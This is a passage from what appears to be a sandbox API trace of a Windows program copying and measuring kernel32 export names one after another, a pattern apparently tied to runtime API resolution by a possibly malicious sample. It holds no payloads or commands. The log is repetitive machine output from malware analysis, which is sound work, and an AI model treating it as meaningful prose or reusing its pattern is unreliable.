returned 29 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.382] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.382] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.382] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.382] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.382] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.382] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.382] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.382] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.382] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.382] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.382] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.382] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.382] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.382] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.382] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.382] lstrlenA (lpString="BEEP") returned 4 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.382] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.382] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.382] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.383] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.383] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.383] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.383] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.383] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.383] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.383] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.383] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.383] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.383] lstrlenA (lpString="CANCELIO") returned 8 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.383] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.383] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.383] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.383] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.383] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.383] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.383] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.383] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.383] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.384] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.384] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.384] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.384] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.384] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.384] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.384] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.384] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.384] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.384] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.384] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.384] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.384] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.384] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.384] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.384] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.384] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.384] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.385] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.385] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.385] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.385] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.385] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.385] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.385] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.385] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.385] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.385] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.385] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.385] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.385] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.385] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.385] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.385] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.385] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.386] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.386] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.386] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.386] lstrlenA (lpString="COPYFILEA") returned 9 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.386] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.386] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.386] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.386] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.386] lstrlenA (lpString="COPYFILEW") returned 9 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.386] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.386] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.386] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.386] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.386] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.386] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.386] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.386] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.386] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.386] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.387] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.387] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.387] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.387] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.387] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.387] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.387] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.387] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.387] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.387] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.387] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.387] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.387] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.387] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.387] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.387] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.387] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.388] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.388] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.388] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.388] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.388] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.388] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.388] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.388] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.388] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.388] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.388] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.388] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.388] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.388] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.388] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.388] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.388] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.389] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.389] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: 